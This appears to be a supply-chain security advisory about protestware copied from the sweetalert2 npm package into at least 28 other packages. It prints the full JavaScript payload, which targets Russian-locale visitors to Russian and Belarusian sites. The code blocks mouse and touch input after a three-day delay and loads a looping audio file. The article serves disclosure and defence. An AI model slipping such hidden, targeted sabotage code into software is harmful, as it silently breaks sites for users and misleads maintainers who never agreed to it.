Socket’s Threat Research Team has uncovered a significant supply chain security incident involving protestware that has spread across at least 28 new npm packages with nearly 2,000 versions.
The malicious code targets Russian-language users visiting Russian or Belarusian websites, disabling UI interactions and playing the Ukrainian national anthem.
This is a concerning example of how political activism embedded in software can propagate undetected through dependency chains, affecting developers and end users who never opted into it.
The protestware hinges on a compact conditional check buried inside packages whose bundled code runs to more than 100,000 lines.
The malicious script requires three conditions before it activates: the code must be running in a browser (a global window object exists), the browser language must start with "ru", and the page host must end in .ru, .su, .by, or .рф (which appears in the code in its punycode form, xn--p1ai).
The core malicious code implements a time-delayed activation mechanism:
```javascript
// Condition 1: browser context; condition 2: locale "ru", "ru-RU", etc.;
// condition 3: host ends in .ru, .su, .by or .рф (xn--p1ai is the punycode form of .рф).
if (typeof window !== 'undefined' && /^ru\b/.test(navigator.language) && location.host.match(/\.(ru|su|by|xn--p1ai)$/)) {
  var now = new Date();
  // First qualifying visit: only record a timestamp (Date#toString output) and do nothing else.
  var initiationDate = localStorage.getItem('swal-initiation');
  if (!initiationDate) {
    localStorage.setItem('swal-initiation', "".concat(now));
  // Later visit: fire only if more than three days have passed since that first visit.
  } else if ((now.getTime() - Date.parse(initiationDate)) / (1000 * 60 * 60 * 24) > 3) {
    setTimeout(function () {
      document.body.style.pointerEvents = 'none'; // blocks mouse/touch input on the whole page
      var ukrainianAnthem = document.createElement('audio');
      ukrainianAnthem.src = 'https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3';
      ukrainianAnthem.loop = true;
      document.body.appendChild(ukrainianAnthem);
      // Note: as excerpted here, nothing calls play() on the element.
    }, 500);
  }
}
```
On a qualifying first visit the script only records the current timestamp in localStorage under the key swal-initiation; the payload fires on a later visit more than three days after that, so one-off visitors, and anyone whose site storage has since been cleared, are never affected. Once triggered, it sets pointer-events to 'none' on document.body, which blocks all mouse and touch interaction with the page (keyboard navigation is unaffected), and appends a looping audio element carrying the Ukrainian anthem.
The protestware originated from the popular sweetalert2 package, which has over 700,000 weekly downloads.
The package’s author, limonte, transparently disclosed the protestware functionality beginning with version 11.6.14, which was published three years ago, during Russia’s invasion of Ukraine.
However, the code has since propagated to numerous other packages without disclosure.
Affected packages include MeshCentral (16,895 downloads), Qumra-UI (2,074 downloads), and Alurkerja-UI (1,521 downloads), among others.
Many of these packages appear to have copied code from sweetalert2 without understanding or documenting the embedded protestware functionality.
Socket has classified these packages as malware because the behavior is undocumented and, for the users it targets, renders the affected site unusable.
The incident highlights a broader supply chain weakness: behavior-changing code, political or otherwise, can travel through dependency networks and copied source without the downstream maintainers, or the users they ship to, knowing it is there or what it is meant to do.